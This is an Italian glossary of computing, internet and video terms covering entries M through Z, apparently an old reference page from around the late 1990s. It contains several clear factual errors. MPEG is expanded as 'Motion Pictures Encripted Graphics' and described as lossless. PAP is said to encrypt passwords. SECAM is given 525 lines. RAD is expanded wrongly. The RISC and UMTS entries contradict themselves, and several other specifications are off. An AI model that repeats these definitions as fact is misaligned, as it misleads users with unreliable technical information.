MPEG (Motion Pictures Encripted Graphics) sistema di compressione video (sviluppata alla fine degli anni 1980) ottimizzato in quanto vengono elaborati più fotogrammi insieme memorizzando solo le differenze senza degrado di qualità. La risoluzione raggiunta è 325×240 NTSC. La decodifica necessaria per la visione dei film può essere effettuata anche via software.

MPEG II come MPEG ma la risoluzione raggiunta è 728×480 NTSC. Ideale per il DVD, richiede processori molto veloci o un hardware specifico per la complessa decodifica che permette la visione dei film.

MP3 MPEG-1 Layer 3, sistema di compressione audio (da formato WAV a MP3) che permette di contenere in un CD audio da 74 minuti, oltre 10 ore di musica. La lettura dei file MP3 richiede un programma apposito e la qualità con le migliori casse che corredano un PC è indistinguibile dall'originale; e così per i Walkman che offrono la possibilità di leggere i CD con audio MP3. Il discorso cambia se si masterizza un CD (con file originariamente MP3) in formato leggibile dai lettori collegati ad un impianto HiFi (a moduli singoli e casse di qualità).

MPRII Uno dei più vecchi e diffusi standard per la riduzione di emissioni elettromagnetiche, prevede che sullo schermo sia stesa una patina conduttiva trasparente, che abbatta le emissioni in maniera sostanziale. 

Multicast  Una particolare forma di Broadcast in cui dei messaggi o pacchetti di dati vengono distribuiti contemporaneamente a diverse stazioni che fanno parte di un gruppo definito all'interno di un elenco di indirizzi.

Multilink PPP (Multilink Point to Point Protocol) Protocollo per trasmissione punto-punto multiconnessione. Una variante del protocollo PPP usata su linee ISDN per cumulare due o più canali a 64 Kbps. Un impiego tipico è con l'interfaccia BRI che dispone di due canali per una velocità di trasmissione complessiva di 128 Kbps.

Multimedia  Computer che integrano funzionalità audio, video e di elaborazione dati.

Multimediale Opera che riunisce immagini, brani musicali e commenti audio. In quest'accezione, una semplice videocassetta è multimediale. Più restrittiva è un'opera multimediale interattiva su CD (p.e. le enciclopedie), dove le immagini, i filmati, i brani audio possono essere selezionati in qualsiasi ordine dal fruitore.

Multiscreen funzione di alcuni apparecchi televisivi che permette la divisione dello schermo in due parti occupate da immagini diverse. Per ottenere questa funzione è necessario un secondo sintonizzatore video (incorporato nel Tv, o se previsto si può utilizzare quello di un videoregistratore). Le schede video per computer, se dotate di sintonizzatore, permettono di vedere in finestra un programma Tv mentre si lavora con un altro programma.

Multi Hosting Abilità di un server Web di supportare più di un indirizzo Internet e più di una home page.

Multitreads Possibilità per un programma di lanciare diversi processi in simultanea.

MVA (Multidomain Vertical Alignment) si tratta di un particolare tipo di cristallo che si posiziona naturalmente in orizzontale, spostandosi in verticale quando è applicata una tensione. Ma la parola chiave di questa tecnologia è MultiDomain: infatti, questi cristalli possono assumere ordinatamente posizioni diverse anche all'interno della stessa cella, garantendo una migliore visibilità del colore di ciascun pixel anche quando l'osservatore non si trova in una posizion perfettamente frontale rispetto allo schermo.

 

N

NCSA (National Center for Supercomputing Applications) Istituto universitario in cui è stato creato il browser Mosaic. http://www.ncsa.uiuc.edu

Network Location In una URL è il singolo nome che identifica un server Internet (ad esempio microsoft.com). È anche chiamata “host name” e “Internet address”.

News Protocollo Internet per ricuperare files da un newsgroup Internet.

Newsgroup (Gruppi di discussione) Possono essere considerati delle “bacheche eletroniche”, ovvero degli spazi in cui ciascuno può affigere i propri messaggi e leggere quelli degli altri.

NTSC (National Television System Committe) standard televisivo negli Usa e Giappone, compatibile con sistemi di ricezione in B/N si basa su una scansione di 525 linee per quadro e 30 quadri al secondo. Altri standard: PAL, SECAM.

 

O

OCR (Optical Carachter Recognition) (Riconoscimento ottico di caratteri) I testi acquisiti da uno scanner, sono visti dal computer come un'immagine. Quest'immagine occupa molto spazio e non può essere letta da un elaboratore di testi. Per far ciò, occorre utilizzare un programma OCR che distingua gli elementi di testo all'interno dell'immagine. Dopo la conversione, si otterrà un file unicamente di testo; le immagini eventualmente presenti dovranno essere salvate a parte.

Octet (Ottetto) Unità costituita da 8 bit. Nell'ambiente Internet è preferito al Byte, perché molti dei computer collegati ad Internet usano un'unità di dati maggiore di 8 bit.

OEM (Original Equipment Manufacturer) Costruttore dal quale un assemblatore acquista i componenti.

OFF-Topic Letteralmente “fuori tema”. Messaggi in un newsgroup che nulla hanno a che fare con il tema del gruppo di discussione. Sono considerati un notevole fastidio.

OLE (Object Linking and Embedding) Legame intimo e fissazione di oggetti. Processo elaborato da Microsoft per facilitare l'interscambio di dati entro programmi compatibili Windows.

On-Line E' un termine riferito al fatto di essere connessi a internet. Quando si naviga o mentre si invia un messaggio di posta elettronica ci si trova on-line

Overburning Il fatto di “carbonizzare”, ovvero gravare un CD Rom al di là della sua capacità teorica massimale. Alcuni programmi specializzati, effettuano questa funzione d'incisione avanzata.

OverDrive Microprocessore destinato a sostituirne un'altro meno performante

 

P

Packet Writing Metodo d'incisione alla volata che permette di registrare dei files su CDR, come pure su un dischetto, o sul disco duro.

PAL (Phase Alternation Line) (linee a fase alternata) Standard televisivo a colori, compatibile con ricezione in B/N, costituito da 625 linee per quadro e 25 quadri per secondo. Adottato dall'Italia e dai Paesi della UE ad eccezione della francia. Altri standard: SECAM, NTSC.

PAP (Password Authentication Protocol)  Protocollo di autenticazione della pasword.Un protocollo che fa parte del PPP e che prevede la cifratura della password fornita da un utente che tenta un accesso remoto. E' un sistema semplice di autenticazione che prevede lo scambio di informazioni nelle due direzioni solo al momento in cui viene attivata la connessione.

PCD (PhotoCD) Formato di file grafico sviluppato da Eastman Kodak.

PDA (Personal Digital Assistant) Apparecchiatura elettronica portatile.

PGP (Pretty Good Privacy)  Programma gratuito che permette di codificare i messaggi in modo da renderli leggibili solo al destinatario.

PING (Packet INternet Groper) (“brancolatore” per pacchetti Internet) Si riferisce ad un programma che permette di inviare uno o più pacchetti di prova (tipicamente tre) a un host Internet per verificarne la raggiungibilità. Quando i pacchetti di test raggiungono l'host vengono rispediti come eco al mittente per confermare se un particolare indirizzo IP è attivo in quel momento e perciò se la macchina che lo utilizza è collegata alla rete.

PIXEL (Picture Element) singolo elemento puntiforme che compone una figura, un testo un grafico sullo schermo.

PKZIP  PKZIP è un'utilità di compressione shareware per PC. Il programma PKUNZIP consente di decomprimere i file compressi di questo tipo.

Plug-in  Si tratta di moduli aggiuntivi di estensione delle funzionalità dei browser. Svolgono svariate attività, tra cui l'ascolto dei file audio durante lo scaricamento, la visualizzazione di animazioni e molto altro.

Plug & Play Funzione di Windows 95 autorizzante un parametraggio automatico delle localizzazioni elettroniche, al fine di evitare i conflitti materiali. Questa norma, per essere utilizzabile, richiede delle periferiche conformi, come pure la presenza di un Bios recente che integri la funzione di Plug & Play.

PNG (Portable Network Graphics)
Un nuovo formato di memorizzazione delle immagini che può essere visualizzato dai browser, migliorando le caratteristiche del formato GIF e JPEG.

POP (Point Of Presence) Connessione Internet di una società di servizi per gli utenti che utilizzano un modem; essendo quasi sempre una connessione locale, evita agli utenti la necessità di dover chiamare un numero interurbano. Ad esempio, un determinato ISP potrebbe trovarsi a Roma, ma disporre di POP a Milano e a Bari.

Ports Una connessione Internet é suddivisa in migliaia di piccoli canali, ognuno corrispondente a un tipo di informazione: esiste un porto per l'e-mail, uno per il Web, uno per le chat, ecc.

Privilegi di Accesso  Autorizzazione ad accedere alle cartelle e a modificarle.

PPP (Point to Point Protocol)  Connessione Internet a commutazione che utilizza il protocollo TCP/IP, leggermente più veloce di SLIP.

Protocol Metodo di accesso ad un documento o un servizio su Internet, come l'FTP (File Transfer Protocol) e l'HTTP (Hypertext Transfer Protocol).

Protocollo  Insieme di regole o procedure per gestire le comunicazioni tra dispositivi.

Provider  Parola usata spesso al posto dell'espressione “Internet Service Provider”, a volte abbreviata in ISP. Soggetto che offre la connessione ad internet.

Proxy Server Server Internet che agisce da “firewall”, mediando il traffico fra network protetto e Internet.

Push Servizio proposto da alcuni siti Web per ricevere automaticamente (per posta elettronica o Backweb) informazioni su un soggetto definito.

 

Q

QDOS (Quick and Dirty Operating System) Sistema operativo per 8088 scritto da Tim Paterson ed acquistato da Microsoft nel 1980 per 50.000 dollari, poi rivenduto a IBM sotto il nome di PC-DOS.

Quick Time VR Sistema di registrazione e lettura di dati audio/video in tempo reale di Apple che permette una vista 3D panoramica di un oggetto.

 

R

Ramdac (Ram Digital Analogic Converter) Componente che assicura la conversione della memoria video in dati analogici, i soli utilizzabili da monitors.

Rasterizzazione processo con il quale una figura costruita matematicamente dal computer viene tracciata su video o su carta sotto forma di una serie di punti. Il processo comprende l'assegnazione di un colore, oppure di una tonalità di grigio, a ciascun punto della figura. Durante questa fase si applica l'eventuale texture e si eseguono tutte le operazioni matematiche su quest'ultima, aggiungendo l'ombreggiatura vera e propria.

Ray Tracing La creazione di riflessi, rifrazioni e ombre su un'immagine grafica. E' come se alcuni raggi di luce emanassero da una sorgente definita dal disegnatore e illuminassero in modo differente l'oggetto conferendogli un aspetto tridimensionale più realistico. Si tratta di un tipo particolare di rendering che cerca di costruire l'oggetto partendo dal punto di vista dell'osservatore e seguendo il percorso ottico fino all'oggetto e da questo alla fonte di luce che in qualche modo vi si riflette sopra. L'operazione assorbe moltissima potenza elaborativa.

RAD (Rapid Environment Development) Termine designante un ambiente di sviluppo che permette la creazione rapida di applicazioni. Un RAD spesso integra un linguaggio di programmazione, un editore d'interfaccia e numerosi moduli. Delphi d'Imprise o Visual Basic di Microsoft, sono degli esempi di RAD.

Real Time  Trasmissione ed elaborazione veloce di dati e transazioni orientati agli eventi nel momento stesso in cui si verificano, senza dover essere salvati e ritrasmessi o rielaborati a batch.

Registry Sotto Windows 3.1 tutte le informazioni di configurazione dei programmi, sono contenute nei files .INI. Sotto Windows 95/98 queste informazioni sono concentrate nella base di registro.

Rendering Metodo di copertura degli scheletri degli oggetti 3D con texture.

Request In un insieme di dati, una richiesta permette di ricercare dei dati in funzione di certi criteri.

Resolution Termine applicabile ad immagini Bitmap che serve a specificare il livello di precisione, specificando il numero di punti per unità di lungezza fornita. La risoluzione si esprime generalmente in punti per pollice (dots per inch, dpi).

Rete  Sistema di elementi interconnessi su linea dedicata o commutata per stabilire una comunicazione locale o remota (per voce, video, dati, ecc.) e per facilitare lo scambio di informazioni tra utenti con interessi comuni.

Risc (Reduced Instruction Set Computer) Computer avente un gioco d'istruzioni ridotto. Si rivela più rapido nel trattare molteplici istruzioni che nel trattare un numero più limitato d'istruzioni più complesse.

Roaming accesso per l'utilizzo di una rete telefonica preesistente ad altri operatori successivamente entrati nel mercato.

Robot Nell'ambito del WWW, i “robot” sono generalmente dei programmi che percorrono tutta la rete alla ricerca di informazioni per indicizzarle in un motore di ricerca o per trovare errori nei siti web.

Roll Over Si tratta di un insieme di pixels di una pagina HTML, generalmente delimitato da un triangolo che può anche essere irregolare. Questo é utilizzato per realizzare dei bottoni interattivi, modificandone l'aspetto al passaggio del cursore del mouse al di sopra della zona in questione.

Router Sistema di rete che connette due reti locali separate oppure una rete locale ed una rete geografica. Il router legge l'indirizzo di provenienza e quello di destinazione di ogni singolo pacchetto, scegliendo il percorso migliore per farlo giungere a destinazione. Per questo, acquisisce eventualmente informazioni da altri router che si trovino sul percorso. Il router filtra qualsiasi pacchetto che non debba uscire dalla LAN di provenienza e in tal modo riduce il traffico sulle dorsali, ossia le connessioni ad alta velocità che uniscono diverse reti tra loro. Nel mondo Internet i router si chiamano anche gateway.

RTF (Rich Text Format) Metodo per codare testi e strutture di documenti che usa il set di caratteri ASCII.

Rush Utilizzato nel settore video per definire le prime immagini che serviranno in seguito al montaggio del film.

RGB Iniziale dei colori rosso,verde e blu che designa il sistema di rappresentazione dei colori. A differenza del modo CMYK dedicato alla stampa, il modo RGB é utilizzato nel settore del video. Un'immagine definita in RGB necessita di minore memoria rispetto ad un'immagine CMYK.

 

S

Script Tipo di codice di computer che può essere eseguito da un programma che interpreta il linguaggio con il quale lo script è stato scritto.

Scrolling Azione di spostare un oggetto orizzontalmente o verticalmente. È applicando uno scrolling ad un testo che si realizzano, ad esempio, i fascioni informativi per il Web.

SCSI (Small Computer System Interface) Interfaccia di gestione di periferiche indipendente dal processore. È in grado di gestire sino a sette moduli differenti, con un tasso di trasferimento a flusso costante o variabile.

SDRam (Synchronous Dynamic Random Access Memory) Nuovo tipo di memoria dalle prestazioni più avanzate rispetto all'EDO.

SECAM (Séquentiel Couleur à Me´moire) standard televisivo compatibile B/N, costituito da 525 linee per quadro e 25 quadri per secondo. Adottato dalla Francia, dai Paesi dell'est europeo e da molti Paesi africani. Altri standard:PAL, NTSC.

Segnale Cambiamento di stato orientato agli eventi (ad es. tono, cambio di frequenza, valore binario, allarmi, messaggi, ecc.).

Selezione Area delimitata dell'immagine sulla quale si andranno a fare delle elaborazioni o che deve essere mossa o duplicata. Una selezione si definisce tracciandone il bordo tramite gli appositi strumenti di selezione dei programmi di grafica.

Serbatoio E' il contenitore dell'inchiostro dentro la cartuccia.

Server Il computer che offre i servizi ad un network. Nel Web è il computer che opera come Web server e risponde a richieste di protocollo HTTP.

SGML (Standard Generalized MarkUP Language) Linguaggio usato per descrivere altri linguaggi strutturali basati su codici per la creazione di documenti. Il linguaggio HTML, ad esempio, viene definito tramite SGML.

Shareware  Programma che può essere copiato e/o liberamente distribuito per un numero illimitato di copie a scopo di valutazione. Se si decide di usarlo oltre il periodo di prova occorre invece pagare.

Sicurezza  Sistemi di controllo per impedire l'uso non autorizzato delle risorse.

Sito Gruppo di pagine web opportunamente organizzate tra loro, in modo da offrire un servizio in internet.

SLIP (Serial Line Internet Protocol) Connessione Internet commutata che utilizza il protocollo TCP/IP (collegamento via modem).

SMP (Symetric Multiprocessing) Architettura materiale di programma che permette di utilizzare simultaneamente diversi processori per effettuare dei multitrattamenti in parallelo. Windows 95 é monoprocessore, mentre Windows NT é in grado di gestire sino a quattro processori.

SMS (Short Message Service) Protocollo per l'invio di messaggi testo attraverso i telefoni portatili GSM.

SMTP (Simple Mail Transfer Protocol) Il protocollo che permette alla posta di partire e viaggiare attraverso internet verso il destinatario. Costituisce lo standard della posta in uscita.

Spazio Web E' uno spazio su un disco rigido che viene ceduto da un provider perchè un utente possa collocarvi le proprie pagine e costruire così un sito internet.

Sponsor azienda che sostiene in tutto o in parte le spese di un programma (o di una manifestazione, o di uno sportivo, ecc.) in cambio di una pubblicità diretta o indiretta dallo stesso (oppure da un ritorno d'immagine). Secondo le norme della UE, il nome dello s. dei programmi televisivi può figurare nei titoli di testa e di coda, ma i suoi prodotti non devono comparire nel corso della trasmissione. Nelle pagine WEB i banner racchiudono il logo dello sponsor: cliccando su questo, si raggiunge il suo sito dedicato.

Sprite Tutti gli elementi indipendenti ed animati su uno schermo. Questo termine é essenzialmente utilizzato nel settore dei giochi. L'evoluzione delle carte grafiche 2D/3D e la potenza dei processori utilizzati nei computers, permettono una gestione dell'immagine a risoluzioni più elevate e dunque degli sprites di taglia più importante nelle applicazioni.

Squeezoom apparecchio elettronico che permette effetti di rotazione, smaterializzazione, scomposizione-ricomposizione, dell'immagine televisiva.

SSL (Secure Sockets Layer) Standard aperto sviluppato da Nescape Communications per stabilire canali di comunicazione sicuri, al fine di prevenire l'intercettazione di informazioni critiche quali le transazioni di pagamento con carte di credito.

Stream o Streaming è una tecnologia che permette di visualizzare/udire un file audio/video mentre è in corso di caricamento.

Surfing passare da un canale Tv all'altro // navigare in INTERNET alla ricerca di nuovi siti

Swatch Internet Time E' un programma freeware rilasciato da Swatch®. Fornisce un orologio virtale (indipendente dalla piattaforma utilizzata) che scandisce un orario valido per tutto il pianeta (quello nostro, con le ore @000 corrispondenti alla sede Svizzera). Ideale per fissare appuntamenti cybernautici in qualsiasi parte del mondo. Lo si trova al sito (http://www.swatch.com)

 

T

Table È l'unità di base per l'organizzazione dei dati. Le colonne corrispondono ai campi, mentre le linee si rapportano alle registrazioni.

Tape nastro per registrazioni audiovideo. Non sono tutti uguali: maggiore è il numero di particelle magnetiche che costituiscono lo strato registrabile, maggiore è la qualità della registrazione. La natura delle particelle magnetiche determina la conservazione nel tempo delle caratteristiche originali.

TAPI (Telephony Application Programming Interface) Standard definito da Microsoft ed applicato da Windows 95 e NT 4.0 per assicurare la compatibilità entro le applicazioni e le periferiche telefoniche.

TCP/IP (Transmission Control Protocol/Internet Protocol) Protocollo di network utilizzato per l'insieme delle comunicazioni su Internet.

Telnet  Programma di rete che permette di collegarsi e lavorare da un altro computer. Collegandosi a un altro sistema, gli utenti possono accedere a servizi Internet che potrebbero non essere disponibili sul loro computer.

Terminal Componente piazzato alla fine di un cavo per evitare che i segnali si moltiplichino imprevedibilmente, generando in tal modo informazioni parassite.

Testina E' la parte mobile della stampante e contiene i circuiti necessari a provocare la fuoriuscita dell'inchiostro da un numero variabile di microscopici ugelli (fori della testina).

Texture Immagine di oggetti (legno, roccia, erba, figure geometriche, ecc.) disegnate in forma di tasselli tali che fatti combaciare tra loro, formano una figura più grande. Le texture sono utilizzate come sfondo per le pagine WEB e per il rendering di figure e oggetti 3D.

TFT (Thin Film Transistor) è il tipo di monitor a cristalli liquidi in cui ciascun pixel è controllato da un numero variabile di transistor (da 1 a 4). La tecnologia TFT è chiamata anche “a matrice arriva”.

TIFF (Tagged Image File Format) Formato grafico ad alta risoluzione, usato per l'interscambio di grafiche digitali.

True Type Standard prescritto da Microsoft per la definizione delle polizze di carattere. Windows 3.x e 95 mantengono tuttavia qualche polizza Bitmap per ragioni di compatibilità .

Twain (Tecnology Without Any Interesting Name) Pilota generico che permette a tutti i programmi compatibili Twain di pilotare una periferica di acquisizione su un PC (uno scanner). Il lavoro di sviluppo e d'installazione dei programmi viene alleggerito.

 

U

UART Circuito elettronico usato per gestire la porta seriale.

UDF (Universal Disk Format) Sistema di files approvato dall'OSTA (Optical Storage Technology Association) per l'utilizzazione del modo di scrittura packet writing ed altre tecnologie per dischi ottici reinscrittibili.

UMTS (Universal Mobile Telecommunication System) Tecnologia di telefonia della terza generazione prevista per il 2002. UMTS assicurerà una capacità di circa 115 Kbits/s, quindi di 2Mbits/s.

Unimodem (Universal Modem Driver) Pilota che fornisce tutti i meccanismi necessari al funzionamento di un modem.

UNIX è il più diffuso sistema operativo per workstation di progettazione, per minicomputer e per server di rete locale. Unix è un sistema operativo molto potente e disponibile su un gran numero di piattaforme diverse. Molto diffuso in ambito scientifico, è da sempre molto comune nel mondo Internet.

UNZIP “Unzippare” significa decomprimere o espandere un file le cui dimensioni sono state ridotte tramite un'utilità di compressione.

URL (Uniform Resource Locator) Definizione univoca della posizione di una risorsa nell'universo di Internet. Si compone del prefisso che indica il tipo di connessione di cui si ha bisogno (http://, news://, file:// ecc.); le due barre preannunciano che l'informazione che segue è il nome del computer su internet cui si sta per avere accesso (per esempio, http://www.gregorys.it)

USB (Universal Serial Bus) Tecnologia Plug&Play che permette di connettere fino a 127 periferiche (mouse, tastiera, scanner,modem, ecc.) su lo stesso canale, autorizzando un tasso di trasferimento pari a circa 12 Mbits/s. Questa norma é stata messa a punto da Compact, Digital, IBM, Intel, Nec e Microsoft.

USENET (USEer NETwork) Newsgroup di Internet. Una delle prime forme di “posta elettronica di gruppo”. Ne esistono attualmente circa 10.000.

 

V

VCR (Video Cassette Recorder) registratore di cassette video.

VESA DPMS Standard di risparmio energetico più moderno ed articolato rispetto all'EPA, prevede quattro diverse modalità operative (acceso, stand-by, suspend, spento) ed una serie di limiti ai consumi in ciascuna di queste fasi.

VHS (Video Home System) il sistema di videoregistrazione amatoriale più diffuso nel mondo. Super VHS è un sistema VHS con caratteristiche semiprofessionali (le cassette registrate con questo standard non possono essere lette da normali vcr VHS; un vcr SVHS legge e incide entrambi gli standard). VHSC = VHSCompact sistema di registrazione per videocamere, usa cassette più piccole che possono essere utilizzate, tramite un supporto adattatore, nei comuni vcr VHS.

Video 8 sistema di videoregistrazione della SONY. La versione Hi-band garantisce una maggior risoluzione e fedeltà delle riprese. Il sistema è essenzialmente diffuso per le videocamere, in contrapposizione al VHSC

Virtual Machine Programma di stratificazione che traduce il codice Java in un linguaggio specifico al microprocessore.

VIRUS  Programma in grado di replicarsi da solo e di creare gli effetti più disparati, che vanno dalla comparsa di annunci sullo schermo fino a dei gravi danni al software.

VPN (Virtual Private Network) Sistema che apre una connessione cifrata entro due macchine, scambiandosi dei pacchetti cifrati su Internet .

VRML (Virtual reality Modeling Language) Linguaggio sposato all'HTLM e destinato al disegno 3D. Per utilizzarlo occorre un plug-in correspondente, il quale trasformi in immagini 3D, sul computer cliente, le istruzioni inviate dal server Web.

VTR (Video Tape Recorder) registratore di nastri video e/o audio.

 

W

WAIS (Wide Area Information Service) Supporto di ricerca veloce di grandi quantità di informazioni su Internet.

WAP (Wireless Application Protocol) Messo a punto dai Wap Forum è un sistema che permette di consultare – in modalità semplificata – siti Internet sviluppati appositamente per trasmettere/ricevere dati dai telefoni cellulari. Per la tecnologia del cellulare (la cui posizione geografica è nota all'Operatore), è possibile ricevere informazioni visive (correlate alla propria posizione) sul percorso da seguire per raggiungere una data strada, un particolare negozio, un Ospedale, ecc. I due principali elementi del Wap sono uno strato di trasporto equivalente al TCP/IP per i networks mobili ed uno strato di presentazione WML.

WAN (Wide Area Network) Network che si estende su una vasta area ed usa computers specializzati per collegare piccoli networks.

Watermark Grafica che appare nel background di una pagina Web per decorare ed identificare la pagina.

WAV Estensione di file utilizzata per alcuni tipi di file audio.

Webmaster  E' la persona che coordina le attività di messa in opera di un sito web oltre alle operazioni di manutenzione, aggiornamento, modifica, integrazione, arricchimento.

WINDOWS RAM Memoria che permette operazioni di lettura e scrittura simultanee. È di circa il 20% meno cara delle Vram (Video ram) e 50% più rapida.

Wire Form Oggetti 3D costituiti dal solo scheletro o intelaiatura, prima di passare al rendering.

WINZIP  Utilità di compressione che permette agli utenti di Windows 95, 3.1, e NT di ridurre le dimensioni dei file per renderne più veloce il trasferimento via modem. Decomprime inoltre i file compressi con PKZIP e i formati TAR. http://www.winzip.com/winzip/

WML (Wireless Markup Language) Applicazione dell'XML: questo linguaggio di descrizione stà al Wap, come l'HTML al Web.

World Wide Web Insieme di documenti interlacciati residenti in servers HTTP attraverso il mondo. I documenti nel Web sono chiamati pagine e sono scritte HTML. Ogni pagina Web è identificata dalla URL che specifica il particolare computer per mezzo del quale un file viene reso accessibile e trasmittibile, da nodo a nodo, sino all'utilizzatore finale, via HTTP. Il World Wide Web è stato sviluppato da Tim Berners-Lee nel 1990 per il CERN (European Laboratory for Particle Physics).

 

Z

ZIF (Zero Insertion Force) Supporto che permette l'installazione e disistallazione di un processore senza dover esercitare una pressione su quest'ultimo, evitando in tal modo di rovinare uno dei preziosi connettori.

ZIP è uno dei formati con cui i dati (anche programmi) binari vengono codificati in modo da richiedere uno spazio minore rispetto ai dati originali. I dati trattati, detti dati compattati, devono essere decompattati per poter essere nuovamente utilizzati. Si può immaginare questo processo come l'equivalente della liofilizzazione: i cibi vengono disidratati per diminuire il loro volume e facilitarne la conservazione ed il trasporto; addizionandoli con acqua potranno poi essere consumati.

Zoom Funzione disponibile nei programmi di grafica computerizzata e di elaborazione testi consistente nell'ingrandimento o riduzione di una parte dell'immagine che compare sul video.